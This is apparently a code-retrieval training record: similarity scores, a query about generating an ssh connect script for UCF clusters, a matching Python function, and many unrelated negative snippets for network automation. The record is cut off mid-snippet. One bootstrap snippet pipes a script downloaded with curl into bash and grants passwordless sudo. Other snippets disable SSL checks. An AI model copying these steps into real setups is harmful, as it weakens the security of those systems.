[ "0.8114062", "0.80263144", "0.7928212", "0.77187544", "0.76588297", "0.7626845", "0.7559527", "0.7490584", "0.74343324", "0.73547065", "0.73352516", "0.73352516", "0.732464", "0.7162539", "0.70716673", "0.7023439", "0.69156", "0.69056416", "0.67387044", "0.6652363", "0.66444236", "0.6607345", "0.65973073", "0.6549967", "0.63368994", "0.6331089", "0.6248447", "0.62060887", "0.6149829", "0.6038843", "0.60388106", "0.6031579", "0.6024765", "0.6022758", "0.600527", "0.5990041", "0.5958379", "0.5952596", "0.59362334", "0.59343463", "0.58978426", "0.58839476", "0.58734274", "0.5866238", "0.58645195", "0.58139503", "0.58006185", "0.57983893", "0.57957673", "0.57902026", "0.57679063", "0.57679063", "0.57599676", "0.5750238", "0.57316244", "0.5701144", "0.56620204", "0.5654828", "0.56446195", "0.5635655", "0.5623229", "0.56232184", "0.56215143", "0.5585304", "0.5584901", "0.55541223", "0.55345833", "0.5527308", "0.55226856", "0.55179244", "0.5516982", "0.55109113", "0.551091", "0.55018455", "0.54988027", "0.54885316", "0.5488024", "0.54868704", "0.5474821", "0.54703987", "0.54694206", "0.5469282", "0.54586554", "0.5451474", "0.54469544", "0.5436312", "0.5431075", "0.5428319", "0.5427472", "0.542554", "0.5419662", "0.54155946", "0.5411733", "0.5402684", "0.5400282", "0.53906727", "0.5388984", "0.53836", "0.5381525", "0.5379315" ]
0.74771315
8
This modules creates a bash file to connect connect the to UCF clusters
def connect(directory_1, directory_2, key_address, user, server): import os # Creates a list of files in the working directory files = os.listdir() # If the bash file already exists, it deletes the bash file before making progress if 'connect.sh' in files: os.remove('connect.sh') else: pass with open('connect.sh', 'w') as f: f.write('#!/bin/bash\n') f.write('ssh -Y -i ' + str(key_address) + ' ' + str(user) + \ '@' + str(server))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():\n mvip, user, user_pass, mvip_node = get_inputs()\n headers, url = build_auth(mvip, user, user_pass, mvip_node)\n payload = build_payload()\n response_json = connect_cluster(headers, url, payload)\n account_table = create_table(response_json)\n print(account_table)", "def main():\n\n # Handling arguments\n args = get_args()\n all_clusters = args.all_clusters\n all_datacenters = args.all_datacenters\n all_hosts = args.all_hosts\n clusters = []\n if args.clusters:\n clusters = args.clusters\n debug = args.debug\n allow_fqdn = args.allow_fqdn\n datacenters = []\n if args.datacenters:\n datacenters = args.datacenters\n hosts = []\n if args.hosts:\n hosts = args.hosts\n host_configure_agent = args.host_configure_agent\n hosts_file = None\n if args.hosts_file:\n hosts_file = args.hosts_file\n hv_username = None\n if args.hv_username:\n hv_username = args.hv_username\n hv_password = None\n if args.hv_password:\n hv_password = args.hv_password\n hv_management_network = None\n if args.hv_management_network:\n hv_management_network = args.hv_management_network\n hv_data_network = None\n if args.hv_data_network:\n hv_data_network = args.hv_data_network\n hv_vm_network = None\n if args.hv_vm_network:\n hv_vm_network = args.hv_vm_network\n hv_mc_network = None\n if args.hv_mc_network:\n hv_mc_network = args.hv_mc_network\n log_file = None\n if args.logfile:\n log_file = args.logfile\n nuage_enterprise = args.nuage_enterprise\n nuage_host = args.nuage_host\n nuage_port = args.nuage_port\n nuage_password = None\n if args.nuage_password:\n nuage_password = args.nuage_password\n nuage_username = args.nuage_username\n nuage_vrs_ovf = None\n if args.nuage_vrs_ovf:\n nuage_vrs_ovf = args.nuage_vrs_ovf\n nosslcheck = args.nosslcheck\n verbose = args.verbose\n vcenter_host = args.vcenter_host\n vcenter_name = vcenter_host\n if args.vcenter_name:\n vcenter_name = args.vcenter_name\n vcenter_https_port = args.vcenter_https_port\n vcenter_http_port = args.vcenter_http_port\n vcenter_password = None\n if args.vcenter_password:\n vcenter_password = args.vcenter_password\n vcenter_username = args.vcenter_username\n\n # Logging settings\n if debug:\n log_level = logging.DEBUG\n elif verbose:\n log_level = logging.INFO\n else:\n log_level = logging.WARNING\n\n logging.basicConfig(filename=log_file, format='%(asctime)s %(levelname)s %(message)s', level=log_level)\n logger = logging.getLogger(__name__)\n\n # Input checking\n if not all_datacenters and len(datacenters) < 1:\n logger.critical('Not all datacenters have to be present in the Nuage Deployment tool (--all-datacenters option NOT enabled), but also no datacenters specified (at least one --datacenter)')\n return 1\n if not all_clusters and len(clusters) < 1:\n logger.critical('Not all clusters have to be present in the Nuage Deployment tool (--all-clusters option NOT enabled), but also no clusters specified (at least one --cluster)')\n return 1\n if not all_hosts and len(hosts) < 1 and not hosts_file:\n logger.critical('Not all hosts have to be present in the Nuage Deployment tool (--all-hosts option NOT enabled), but also no hosts specified (at least one --host or specify a file with the host information via --hosts-file)')\n return 1\n if all_datacenters and len(datacenters) > 0:\n logger.warning('You enabled all datacenters and added individual datacenter options, --all-datacenters takes precendence and overwrites the specified datacenters.')\n datacenters = []\n if all_clusters and len(clusters) > 0:\n logger.warning('You enabled all clusters and added individual cluster options, --all-clusters takes precendence and overwrites the specified clusters.')\n clusters = []\n if all_hosts and len(hosts) > 0 and not hosts_file:\n logger.warning('You enabled all hosts and added individual hosts options, --all-hosts takes precendence and overwrites the specified hosts.')\n hosts = []\n elif all_hosts and len(hosts) < 1 and hosts_file:\n logger.warning('You enabled all hosts and provided a hosts file, the hosts file takes precendence over the --all-hosts flag and this flag will be ignored.')\n all_hosts = False\n elif not all_hosts and len(hosts) > 0 and hosts_file:\n logger.warning('You specified host with the --host argument and provided a hosts file, the hosts file takes precendence over the --host paramerters and these will be ignored.')\n hosts = []\n\n # CSV Handling\n hosts_list = None\n if hosts_file:\n hosts_list = {}\n # CSV fields:\n # VM Name, Resource Pool, Folder, MAC Address, Post Script\n logger.debug('Parsing csv %s' % hosts_file)\n\n if not os.path.isfile(hosts_file):\n logger.critical('CSV file %s does not exist, exiting' % hosts_file)\n return 1\n\n with open(hosts_file, 'rb') as hostlist:\n hosts_list_raw = csv.reader(hostlist, delimiter=',', quotechar='\"')\n for row in hosts_list_raw:\n logger.debug('Found CSV row: %s' % ','.join(row))\n # Adding IP to the hosts variable so it can also be used in further handling if it's a valid IP\n if allow_fqdn or ip_address_is_valid(row[0]):\n hosts_list[row[0]] = row\n hosts.append(row[0])\n else:\n logger.warning('Found an invalid IP %s in the hosts file and FQDNs are not allowed, skipping line' % row[0])\n\n # Getting user password for Nuage connection\n if nuage_password is None:\n logger.debug('No command line Nuage password received, requesting Nuage password from user')\n nuage_password = getpass.getpass(prompt='Enter password for Nuage host %s for user %s: ' % (nuage_host, nuage_username))\n\n # Getting user password for vCenter connection\n if vcenter_password is None:\n logger.debug('No command line vCenter password received, requesting vCenter password from user')\n vcenter_password = getpass.getpass(prompt='Enter password for vCenter host %s for user %s: ' % (vcenter_host, vcenter_username))\n\n # Getting user password for hosts\n if hv_password is None:\n logger.debug('No command line Host password received, requesting Host password from user')\n hv_password = getpass.getpass(prompt='Enter password for the hosts inside vCenter %s for user %s: ' % (vcenter_host, hv_username))\n\n try:\n vc = None\n nc = None\n\n # Connecting to Nuage\n try:\n logger.info('Connecting to Nuage server %s:%s with username %s' % (nuage_host, nuage_port, nuage_username))\n nc = vsdk.NUVSDSession(username=nuage_username, password=nuage_password, enterprise=nuage_enterprise, api_url=\"https://%s:%s\" % (nuage_host, nuage_port))\n nc.start()\n except IOError:\n pass\n\n if not nc or not nc.is_current_session():\n logger.error('Could not connect to Nuage host %s with user %s and specified password' % (nuage_host, nuage_username))\n return 1\n\n # Connecting to vCenter\n try:\n logger.info('Connecting to vCenter server %s:%s with username %s' % (vcenter_host, vcenter_https_port, vcenter_username))\n if nosslcheck:\n vc = SmartConnectNoSSL(host=vcenter_host, user=vcenter_username, pwd=vcenter_password, port=int(vcenter_https_port))\n else:\n vc = SmartConnect(host=vcenter_host, user=vcenter_username, pwd=vcenter_password, port=int(vcenter_https_port))\n\n except IOError:\n pass\n\n if not vc:\n logger.error('Could not connect to vCenter host %s with user %s and specified password' % (vcenter_host, vcenter_username))\n return 1\n\n logger.debug('Registering vCenter disconnect at exit')\n atexit.register(Disconnect, vc)\n\n logger.info('Connected to both Nuage & vCenter servers')\n\n # Check if the vCenter exists in Nuage vCenter Deployment Tool\n nuage_vcenter = None\n logger.debug('Checking if vCenter %s is already present in Nuage vCenter Deployment Tool' % vcenter_name)\n for nvc in nc.user.vcenters.get():\n if nvc.ip_address == vcenter_host:\n logger.debug('Found vCenter %s, not recreating' % vcenter_name)\n nuage_vcenter = nvc\n break\n\n # If th vCenter does not exist in Nuage vCenter Deployment Tool, create it\n if not nuage_vcenter:\n logger.debug('vCenter %s with IP %s not found in the Nuage vCenter Deployment Tool, creating' % (vcenter_name, vcenter_host))\n nuage_vcenter = vsdk.NUVCenter(name=vcenter_name, ip_address=vcenter_host, user_name=vcenter_username, password=vcenter_password, http_port=vcenter_http_port, https_port=vcenter_https_port, ovf_url=nuage_vrs_ovf)\n nc.user.create_child(nuage_vcenter)\n logger.info('Created vCenter %s in the Nuage vCenter Deployment Tool' % vcenter_name)\n\n # Datacenter Handling\n # Gathering all Datacenters inside the vCenter\n logger.debug('Gathering all Datacenters from vCenter')\n content = vc.content\n obj_view = content.viewManager.CreateContainerView(content.rootFolder, [vim.Datacenter], True)\n vc_dc_list = obj_view.view\n obj_view.Destroy()\n\n # Gathering all Datacenters inside the Nuage vCenter\n logger.debug('Gathering all Datacenter from the Nuage vCenter entry')\n nc_dc_list = nuage_vcenter.vcenter_data_centers.get()\n\n # Parsing all datacenters\n for vc_dc in vc_dc_list:\n if all_datacenters or vc_dc.name in datacenters:\n logger.debug('vCenter Datacenter %s is in list that has to be present in the Nuage vCenter Deployment Tool, checking if it already exists.' % vc_dc.name)\n handle_vdt_datacenter(logger=logger, nc=nc, vc=vc, nuage_vcenter=nuage_vcenter, vc_dc=vc_dc, nc_dc_list=nc_dc_list, vcenter_name=vcenter_name, all_clusters=all_clusters, all_hosts=all_hosts, clusters=clusters, hosts=hosts, hosts_list=hosts_list, hv_username=hv_username, hv_password=hv_password, hv_management_network=hv_management_network, hv_data_network=hv_data_network, hv_vm_network=hv_vm_network, hv_mc_network=hv_mc_network, host_configure_agent=host_configure_agent, allow_fqdn=allow_fqdn)\n\n logger.info('Completed all tasks.')\n return 0\n\n except vmodl.MethodFault as e:\n logger.critical('Caught vmodl fault: %s' % e.msg)\n return 1\n except Exception as e:\n logger.critical('Caught exception: %s' % str(e))\n return 1", "def main():\r\n mvip, user, user_pass, mvip_node = get_inputs()\r\n payload = build_payload()\r\n headers, url = build_auth(mvip, user, user_pass, mvip_node)\r\n response_json = connect_cluster(headers, url, payload)\r\n paired_vols = get_replication_status(response_json)\r\n payload = get_vol_stats(paired_vols)\r\n response_json = connect_cluster(headers, url, payload)\r\n parse_volume_stats(paired_vols, response_json)", "def main():\n module = AnsibleModule(\n argument_spec=dict(\n pn_cliusername=dict(required=False, type='str'),\n pn_clipassword=dict(required=False, type='str', no_log=True),\n pn_switch_list=dict(required=False, type='list', default=[]),\n )\n )\n\n global CHANGED_FLAG\n results = []\n message = ''\n switch_list = module.params['pn_switch_list']\n\n # Create cluster\n if len(switch_list) == 2:\n message += create_cluster(module, switch_list)\n\n for switch in switch_list:\n replace_string = switch + ': '\n for line in message.splitlines():\n if replace_string in line:\n results.append({\n 'switch': switch,\n 'output': (line.replace(replace_string, '')).strip()\n })\n\n # Exit the module and return the required JSON.\n module.exit_json(\n unreachable=False,\n msg='cluster creation succeeded',\n summary=results,\n exception='',\n failed=False,\n changed=True if True in CHANGED_FLAG else False,\n task='Create clusters'\n )", "def main():\n cli(\n auto_envvar_prefix='CFN',\n prog_name='cfn-cli'\n )", "def setup(ctx, cluster_url):\n if ctx.obj[\"debug\"]:\n click.echo(\"Debug mode initiated\")\n set_trace()\n\n logger.debug(\"cluster setup subcommand\")", "def main():\n\n ericsson_connect = {\n \"device_type\": \"ericsson_ipos\",\n \"ip\": \"1.1.1.1\",\n \"username\": \"admin\",\n \"password\": \"admin\",\n }\n\n net_connect = ConnectHandler(**ericsson_connect)\n output = net_connect.send_command(\"show ip int brief\")\n print(output)\n\n output_commit = net_connect.commit()\n print(output_commit)", "def main():\n\n\n fab_list = get_fabric_list(SANNAV_IP_ADDRESS, SANNAV_FOS_USERNAME, SANNAV_FOS_PASSWORD)\n\n # Print all known facts about the fabrics and the switches\n # Comment out this print statement if this code will be used to generate\n # an Ansible Tower inventory.\n print(json.dumps(fab_list))\n\n # This section of code formats the results to be in a format acceptable to Ansible Tower (awx).\n # To use it, unblock the following block of code and comment out the preceeding print statement.\n\n _ = \"\"\"\n toAwx = {'_meta': {'hostvars': {}}}\n\n for fabric in fab_list[\"Fabrics\"]:\n toAwx[fabric[\"name\"]] = { 'hosts': []}\n for switch in fabric[\"Switches\"]:\n toAwx[fabric[\"name\"]]['hosts'].append(switch['ipAddress'])\n print(json.dumps(toAwx));\n \"\"\"", "def connect_to_master():", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n host = config.get(\"CLUSTER\",\"HOST\")\n dbname = config.get(\"CLUSTER\",\"DB_NAME\")\n user = config.get(\"CLUSTER\",\"DB_USER\")\n password = config.get(\"CLUSTER\",\"DB_PASSWORD\")\n port = config.get(\"CLUSTER\",\"DB_PORT\")\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(host,\n dbname,\n user,\n password,\n port))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def bootstrap():\n validate_configurator_version()\n\n # put new mkinitcpio.conf in place\n run(\"mv /etc/mkinitcpio.conf.pacnew /etc/mkinitcpio.conf\")\n sed(\"/etc/mkinitcpio.conf\",\n 'MODULES=\"\"',\n 'MODULES=\"xen-blkfront xen-fbfront xen-kbdfront xen-netfront xen-pcifront xenbus_probe_frontend xenfs\"') # nopep8\n sed(\"/etc/mkinitcpio.conf\",\n 'HOOKS=\"base udev autodetect modconf block filesystems keyboard fsck',\n 'HOOKS=\"base udev block filesystems shutdown autodetect\"')\n\n # upgrade pacakges\n run(\"pacman --noconfirm -Syu\")\n\n # put new pacman.conf in place\n run(\"mv /etc/pacman.conf.pacnew /etc/pacman.conf\")\n\n # install essential packages\n run(\"pacman --noconfirm -S base-devel\")\n run(\"pacman --noconfirm -S curl git rsync\")\n\n # create a user, named 'aur', to safely install AUR packages under fakeroot\n # uid and gid values auto increment from 1000\n # to prevent conficts set the 'aur' user's gid and uid to 902\n run(\"groupadd -g 902 aur && useradd -m -u 902 -g 902 -G wheel aur\")\n\n # allow users in the wheel group to sudo without a password\n uncomment(\"/etc/sudoers\", \"wheel.*NOPASSWD\")\n\n # install yaourt and upgrade non-pacman rackspace installed packages\n sudo(\"rm -rf /home/aur/.builds && mkdir /home/aur/.builds/\", user=\"aur\")\n with cd(\"/home/aur/.builds/\"):\n sudo(\"bash <(curl aur.sh) -si --noconfirm package-query yaourt\", user=\"aur\")\n sudo(\"yaourt --noconfirm -S xe-guest-utilities\", user=\"aur\")\n\n # allow fabric to sftp with contrib.files.put\n # http://stackoverflow.com/questions/10221839/cant-use-fabric-put-is-there-any-server-configuration-needed # nopep8\n # change before reboot because then the sshd config will be reloaded\n # sed(\"/etc/ssh/sshd_config\", \"Subsystem sftp /usr/lib/openssh/sftp-server\",\n # \"Subsystem sftp internal-sftp\")\n\n # systemd\n sed(\"/boot/grub/menu.lst\",\n \"kernel /boot/vmlinuz-linux root=/dev/xvda1 ro console=hvc0\",\n \"kernel /boot/vmlinuz-linux root=/dev/xvda1 ro console=hvc0 init=/usr/lib/systemd/systemd\")\n reboot()\n if not contains(\"/proc/1/comm\", \"systemd\"):\n abort(\"systemd is not installed properly\")\n server = [s for s in env.bootmachine_servers if s.public_ip == env.host][0]\n run(\"hostnamectl set-hostname {0}\".format(server.name))\n run(\"mv /etc/locale.gen.pacnew /etc/locale.gen.conf\")\n uncomment(\"/etc/locale.gen\", \"en_US.UTF-8 UTF-8\")\n uncomment(\"/etc/locale.gen\", \"en_US ISO-8859-1\")\n run(\"locale-gen\")\n run(\"localectl set-locale LANG='en_US.utf8'\")\n run(\"timedatectl set-timezone US/Central\")", "def main(args):\n # Getting the missing parameters, if any.\n if not args.username:\n args.username = raw_input(\"Please enter username: \")\n if not args.password:\n args.password = getpass(\"Please enter password: \")\n if not args.filename:\n args.filename = raw_input(\"Please enter filename: \")\n # Reading file.\n nodes = read_file(args.filename)\n # Open the vars file.\n vars_file = open(\"./roles/router/vars/main.yml\", 'a')\n # Obtaining loopback information.\n neighbors = {\"cisco\" : \"\", \"juniper\" : \"\", \"vyatta\" : \"\" }\n cisco, cisco_as = CiscoLoopback()\n juniper, juniper_as = JuniperLoopback()\n vyatta, vyatta_as = VyattaLoopback()\n # Obtaining neighbors information.\n cisco_ne = Neighbors(\"cisco\")\n juniper_ne = Neighbors(\"juniper\")\n vyatta_ne = Neighbors(\"vyatta\")\n # Starting to buil the file's schema.\n cisco_vars = CISCOTEMPLATE % (cisco_as)\n vars_file.write(cisco_vars)\n for interface in cisco:\n a = CISCOLOOPBACK % (interface, cisco[interface][\"address\"], cisco[interface][\"network\"], cisco[interface][\"mask\"])\n vars_file.write(a)\n\n vars_file.write(CISCONEIGHBORS)\n for neighbor in cisco_ne:\n if neighbor == \"cisco\":\n for element in cisco_ne[neighbor]:\n a = NEIGHBORS % (element, cisco_ne[neighbor][element])\n vars_file.write(a)\n\n juniper_vars = JUNIPERTEMPLATE % (juniper_as)\n vars_file.write(juniper_vars)\n for interface in juniper:\n a = LOOPBACK % (interface, juniper[interface][\"address\"], juniper[interface][\"network\"])\n vars_file.write(a)\n vars_file.write(JUNIPERNEIGHBORS)\n for neighbor in juniper_ne:\n if neighbor == \"juniper\":\n for element in juniper_ne[neighbor]:\n a = NEIGHBORS % (element, juniper_ne[neighbor][element])\n vars_file.write(a)\n\n vyatta_vars = VYATTATEMPLATE % (vyatta_as)\n vars_file.write(vyatta_vars)\n for interface in vyatta:\n a = LOOPBACK % (interface, vyatta[interface][\"address\"], vyatta[interface][\"network\"])\n vars_file.write(a)\n vyatta_neighbors_var = VYATTANEIGHBORS\n vars_file.write(vyatta_neighbors_var)\n for neighbor in vyatta_ne:\n if neighbor == \"vyatta\":\n for element in vyatta_ne[neighbor]:\n a = NEIGHBORS % (element, vyatta_ne[neighbor][element])\n vars_file.write(a)\n # Closing and saving the file.\n vars_file.close()\n\n time.sleep(2)\n # Generating the templates.\n os.system(\"ansible-playbook site.yml\")\n time.sleep(2)\n # Loading cisco configuration.\n try:\n with open(\"cisco_template.txt\", 'r') as f:\n cisco_template = f.read()\n except IOError:\n print \"File cisco_template does not exist!\"\n # Loading Juniper configuration.\n try:\n with open(\"juniper_template.txt\", 'r') as f:\n juniper_template = f.read()\n except IOError:\n print \"File juniper_template does not exist!\"\n # Loading Vyatta configuration.\n try:\n with open(\"vyatta_template.txt\", 'r') as f:\n vyatta_template = f.read()\n except IOError:\n print \"File vyatta_template does not exist!\"\n # Configuring the devices.\n for device in nodes:\n if nodes[device][\"platform\"] == \"CiscoIOS\":\n run_commands(nodes[device][\"ipv4_address\"], args.username, args.password, cisco_template, platform=\"cisco\")\n print \"***CISCO CONFIGURATION COMPLETED***\"\n elif nodes[device][\"platform\"] == \"Juniper\":\n run_commands(nodes[device][\"ipv4_address\"], args.username, args.password, juniper_template, platform=\"juniper\")\n print \"***JUNIPER CONFIGURATION COMPLETED***\"\n else:\n run_commands(nodes[device][\"ipv4_address\"], args.username, args.password, vyatta_template, platform=\"vyatta\")\n print \"***VYATTA CONFIGURATION COMPLETED***\"", "def connect_subproc():\n return factory.connect_subproc([sys.executable, \"-u\", SERVER_FILE, \"-q\", \"-m\", \"stdio\"], \n SlaveService)", "def main():\r\n parser = argparse.ArgumentParser(description=\"\"\"Starts SSH session with one\r\n of ARC\\'s Raspberrypis.\"\"\")\r\n\r\n parser.add_argument('usr', help='Username for the remote device.')\r\n parser.add_argument('pwd', help='Password for arc.pi.reg@gmail.com.')\r\n\r\n args = parser.parse_args()\r\n\r\n address = get_IP(IP_list(args.pwd), args.usr)\r\n os.system(\"ssh \" + \"pi\" + \"@\" + address)", "def main():\n\n # Handling arguments\n args = get_args()\n debug = args.debug\n log_file = None\n if args.logfile:\n log_file = args.logfile\n nuage_enterprise = args.nuage_enterprise\n nuage_host = args.nuage_host\n nuage_port = args.nuage_port\n nuage_password = None\n if args.nuage_password:\n nuage_password = args.nuage_password\n nuage_username = args.nuage_username\n# nosslcheck = args.nosslcheck\n verbose = args.verbose\n fip_net = args.fip_net\n uplink_addr = args.uplink_addr\n uplink_mask = args.uplink_mask\n uplink_gw = args.uplink_gw\n uplink_ip = args.uplink_ip\n uplink_mac = args.uplink_mac\n gw_name = args.gw_name\n gw_port = args.gw_port\n gw_vlan = args.gw_vlan\n\n # Logging settings\n if debug:\n log_level = logging.DEBUG\n elif verbose:\n log_level = logging.INFO\n else:\n log_level = logging.WARNING\n\n logging.basicConfig(filename=log_file, format='%(asctime)s %(levelname)s %(message)s', level=log_level)\n logger = logging.getLogger(__name__)\n\n # Getting user password for Nuage connection\n if nuage_password is None:\n logger.debug('No command line Nuage password received, requesting Nuage password from user')\n nuage_password = getpass.getpass(prompt='Enter password for Nuage host %s for user %s: ' % (nuage_host, nuage_username))\n\n try:\n # Connecting to Nuage\n logger.info('Connecting to Nuage server %s:%s with username %s' % (nuage_host, nuage_port, nuage_username))\n nc = vsdk.NUVSDSession(username=nuage_username, password=nuage_password, enterprise=nuage_enterprise, api_url=\"https://%s:%s\" % (nuage_host, nuage_port))\n nc.start()\n\n except Exception as e:\n logger.error('Could not connect to Nuage host %s with user %s and specified password' % (nuage_host, nuage_username))\n logger.critical('Caught exception: %s' % str(e))\n return 1\n\n nuage_user = nc.user\n\n\n # Getting the parentID of FIP subnet\n logger.debug('Getting FIP subnet parent ID')\n fip_obj = nuage_user.subnets.get_first(filter=\"address == '{0}'\".format(fip_net))\n \n # Fail if FIP subnet object was not found\n if not fip_obj:\n logger.critical('FIP subnet {0} was not found'.format(fip_net))\n return 1\n\n shared_resource_id = fip_obj.parent_id\n logger.debug('FIP parent ID is: {0}'.format(shared_resource_id))\n\n\n # Locating a gateway port and creating a new VLAN\n logger.debug('Creating a new VLAN on Gateway port')\n new_vlan = vsdk.NUVLAN(value=gw_vlan)\n gw = nuage_user.gateways.get_first(filter=\"name == '{0}'\".format(gw_name))\n\n # Fail if Gateway was not found\n if not gw:\n logger.critical('Gateway {0} was not found'.format(gw_name))\n return 1\n\n port = gw.ports.get_first(filter=\"name == '{0}'\".format(gw_port))\n\n # Fail if Port requirements are not met\n if not port:\n logger.critical('Port {0} was not found on Gateway {1}'.format(gw_port, gw_name))\n return 1\n elif not port.port_type == 'ACCESS':\n logger.critical('Port {0} is not an ACCESS port type'.format(gw_port))\n return 1\n elif not int(gw_vlan) in range(*[int(x) for x in port.vlan_range.split('-')]):\n logger.critical('Vlan {0} is not part of the port vlan range: {1}'.format(gw_vlan, port.vlan_range))\n return 1\n elif port.vlans.get_first(filter=\"value == {0}\".format(gw_vlan)):\n logger.critical('Vlan {0} already exists on port {1}'.format(gw_vlan, gw_port))\n return 1\n\n port.create_child(new_vlan)\n vlan_id = new_vlan.id\n logger.debug('New VLAN ID is: {0}'.format(vlan_id))\n\n\n # Constructing an Uplink Subnet object\n logger.debug('Creating an Uplink Subnet')\n shared_subnet = vsdk.NUSharedNetworkResource(name='uplink subnet {0}'.format(uplink_addr.replace('.','-')), \\\n description='Uplink subnet to Gateway {0}'.format(gw_name.replace('.','-')), \\\n address=uplink_addr, \\\n netmask=uplink_mask, \\\n gateway=uplink_gw, \\\n type=UPLINK_TYPE, \\\n uplink_interface_ip=uplink_ip, \\\n uplink_interface_mac=uplink_mac, \\\n uplink_gw_vlan_attachment_id=vlan_id, \\\n shared_resource_parent_id=shared_resource_id, \\\n uplink_vport_name = 'uplink vport {0} Vlan{1}'.format(gw_port, gw_vlan))\n\n # Creating a subnet on VSD\n nuage_user.create_child(shared_subnet)\n\n logger.info('Uplink Subnet is created')\n return 0", "def main():\n rs = redshift(config_file=CONFIG_FILENAME)\n \n # check if cluster already available\n try:\n clust_avail = check_available(rs)\n except rs_client.exceptions.ClusterNotFoundFault:\n clust_avail = False\n\n # if cluster not available, create it\n if not clust_avail:\n create_cluster(rs) \n \n print(f'Cluster is available. Cluster information: \\n{rs.get_cluster_info()}')", "def main():\n # Set these to your own details.\n myssh = connect('example.com')\n myssh.put('ssh.py')\n myssh.close()", "def main(password=PASSWORD):\n global c\n print('[+] Connecting to \"{}\" ... '.format(ADDRESS))\n c = fc.FritzConnection(address=ADDRESS, password=password)\n\n # check connection by getting DeviceInfo\n try:\n print('[+] Connected to ', c.call_action('DeviceInfo:1', 'GetInfo')['NewModelName'])\n except Exception as e:\n print('[-] Could not connect!')\n print(e)\n exit(1)", "def setupMonti():\n #Update /etc/hosts with mongo-server and management-engine nodes\n sudo(\"apt-get install zookeeper\")\n sudo(\"apt-get install zookeeperd\")\n sudo(\"pip2 install chariot-runtime\")\n #update configuration file located in /etc/chariot/chariot.conf\n run (\"cd /etc/init.d && sudo update-rc.d chariot-nmw defaults 99\")\n sudo(\"reboot\")", "def main():\n with Scrapli(**MY_DEVICE) as conn:\n print(conn.get_prompt())\n print(conn.send_command(\"show run | i hostname\").result)", "def main():\n\n global _VEHICLECLIENT\n\n logfiles.create_application_log(_LOGGER)\n _LOGGER.info(f\"Ford Connect trip log utility {version.get_version()}\")\n\n config = read_config()\n if not config:\n _LOGGER.error(\"Error processing YAML configuration - exiting\")\n return\n\n fordconnect = config.get('fordconnect')\n _VEHICLECLIENT = Vehicle(\n username=fordconnect.get('username'),\n password=fordconnect.get('password'),\n vin=fordconnect.get('vin'),\n )\n\n tripLogs = get_triplogs()\n _LOGGER.info(f\"Trip logs: {tripLogs}\")", "def make_xfer_config(hostname, identfile, user='root'):\n xc = \"\"\n xc += \"Host %s\\n\" % (hostname)\n xc += \"Hostname %s\\n\" % (hostname)\n xc += \"User %s\\n\" % (user)\n xc += \"IdentityFile %s\\n\" % (identfile)\n xc += \"Compression yes\\n\"\n xc += \"StrictHostKeyChecking no\\n\"\n xc += \"UserKnownHostsFile /dev/null\\n\"\n return xc", "def localhost():\n env.run = local\n env.cd = lcd\n env.deployment = 'local'", "def main():\n # kickoff The Norn\n nr = kickoff()\n\n # enable SCP\n c_print(f\"Enabling SCP for NAPALM on all devices\")\n # run The Norn to enable SCP\n nr.run(task=scp_enable)\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # gather switch info\n c_print(\"Gathering device configurations\")\n # run The Norn to get info\n nr.run(task=get_info)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # render switch configs\n c_print(f\"Rendering IBNS dot1x configurations\")\n # run The Norn to render dot1x config\n nr.run(task=render_configs)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # apply switch configs\n c_print(f\"Applying IBNS dot1x configuration files to all devices\")\n # prompt to proceed\n proceed()\n # run The Norn to apply config files\n nr.run(task=apply_configs)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # verify dot1x configs\n c_print(f\"Verifying IBNS dot1x configuration of all devices\")\n # run The Norn to verify dot1x config\n nr.run(task=verify_dot1x, num_workers=1)\n # print failed hosts\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)\n\n # disable SCP\n c_print(f\"Disabling SCP server on all devices\")\n # prompt to proceed\n proceed()\n # run The Norn to disable SCP and save configs\n nr.run(task=scp_disable)\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n hostname = get_hostname(config)\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(\n hostname,\n config.get(\"CLUSTER\", \"DB_NAME\"),\n config.get(\"CLUSTER\", \"DB_USER\"),\n config.get(\"CLUSTER\", \"DB_PASSWORD\"),\n config.get(\"CLUSTER\", \"DB_PORT\"))\n )\n\n cur = conn.cursor()\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n uilist = {\n 'joyride':(\"Uses a joystick for steering and outputs console text\", joyride),\n 'curses':(\"A simple curses-based output UI with very basic arrow-key steering\", cursesui),\n 'framebuffer':(\"An output intenteded for the on-board computer, with no steering\", framebuffer),\n }\n\n parser = OptionParser()\n\n uigroup = OptionGroup(parser, \"UI options\")\n uigroup.add_option('-u', '--ui', action=\"store\", type=\"choice\", dest=\"ui\", default=\"joyride\", choices=uilist.keys(),\n help=\"Interact with this type of UI [Default: joyride]\")\n uigroup.add_option('-j', '--joystick', action=\"store\", type=\"string\", dest=\"joystick_device\", default=None,\n help=\"Path to the device file of the joystick (for joyride UI) [Default: None]\")\n uigroup.add_option('-s', '--disable-sound', action=\"store_false\", dest=\"sound\", default=True,\n help=\"Disable sound [Default: False]\")\n uigroup.add_option('-i', '--disable-input', action=\"store_false\", dest=\"allow_input\", default=True,\n help=\"Disable input [Default: False]\")\n uigroup.add_option('-c', '--become-controller', action=\"store_true\", dest=\"become_controller\", default=False,\n help=\"Become exclusive controlling connection [Default: False]\")\n uigroup.add_option('-n', '--no-control', action=\"store_false\", dest=\"allow_control\", default=True,\n help=\"Ignore all UI commands from this client [Default: False]\")\n uigroup.add_option(\"--list\", action=\"store_true\", dest=\"list\", default=False,\n help=\"List the available UIs and exit\")\n parser.add_option_group(uigroup)\n\n netgroup = OptionGroup(parser, \"Network options\")\n netgroup.add_option('-a', '--host', action=\"store\", type=\"string\", dest=\"host\", default=\"localhost\",\n help=\"Host/address to 